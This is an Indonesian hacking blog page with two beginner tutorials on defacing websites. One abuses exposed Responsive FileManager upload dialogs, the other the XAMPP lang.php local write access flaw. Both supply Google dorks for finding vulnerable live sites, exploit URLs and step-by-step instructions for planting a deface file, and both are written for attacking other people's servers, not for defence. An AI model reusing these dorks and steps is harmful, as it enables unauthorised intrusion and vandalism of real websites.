Tempat para Developer Gaptek

AD BANNER
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

28 August 2017

Tutorial Deface Teknik Responsive FileManager

August 28, 2017 2
Assalamu'alaikum wr.wb

malem guys!
hari ini saya akan share tutorial deface dengan teknik responsive file manager. POC Responsive FileManager ini sudah tua menurut saya. Oh iya, baca juga tutorial deface sebelumnya ( Baca : Tutorial Deface Teknik Xampp Local Write Access Vulnerability ). Lanjut yok!


Bahan :

Dork :
- inurl:/filemanager/ intext:"dialog.php"
- inurl:/static/filemanager/ intext:"dialog.php"
- inurl:/js/filemanager/ intext:"dialog.php"
- inurl:/assets/filemanager/ intext:"dialog.php"
note : kembangkan lagi dorknya, supaya joss.

Exploit :
- localhost/filemanager/dialog.php


Tutorial :

1. Cari targetnya pake dork diatas.


2. Buka targetnya.


3. Lalu masukan Exploitnya. cth : site.co.li/[path]/dialog.php atau klik saja dialog.php di file indexnya.


4. Setelah itu, upload file deface kalian. Note: target saya ternyata tidak diperbolehkan mengupload dengan ekstensi html, jadi saya upload file txt saja.



5. Sekarang tinggal akses ke file defacenya. Caranya klik kanan pada file yang telah diupload tadi lalu klik Show Link.


6. Copy dan paste di address bar browser.


7. Tusuked!



Gampang kan? sip! boleh dong nitip nick imSoulHunter_

Oke sekian tutorial deface teknik responsive file manager kali ini.
Mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

25 August 2017

Tutorial Deface Teknik Xampp Local Write Access

August 25, 2017 1
Assalamu'alaikum wr.wb

Malam guys, hari ini saya akan share POC Xampp Local Write Access. Xampp Local Write Access ini memang sudah kuno sih, tapi biarin aja dah buat ngisi ni blog supaya ga sepi. berikut tutorial deface untuk pemula. lah pemula :v wkwkwk. Oke Langsung aja ya...

xampp local write access vulnerability


Bahan :

1. Dork :
- inurl:/xampp/index.php intitle:XAMPP
- inurl:/xampp/lang.php
- inurl:/security/lang.php
- inurl:/xampp/splash.php

2. Exploit :
- localhost/xampp/lang.php?hacked_by_imSoulHunterz
- localhost/security/lang.php?hacked_by_imSoulHunterz


Tutorial :

1. Cari targetnya pake Dork diatas.

2. Masukan salah satu exploitnya. cth : site.co.li/xampp/lang.php?hacked_by_imSoulHunterz
tutorial deface teknik xampp local write access


3. Ada notice seperti berikut. Abaikan saja.
deface dengan teknik xampp local write access


4. Lalu akses hasil defacenya. cth : site.co.li/security/lang.tmp
tutorial deface bagi pemula



Gampang kan? boleh dong nitip Nick. imSoulHunterz_

oke sekian tutorial deface hari ini.
mohon maaf bila ada kesalahan.
Wassalamu'alaikum wr.wb.
AD BANNER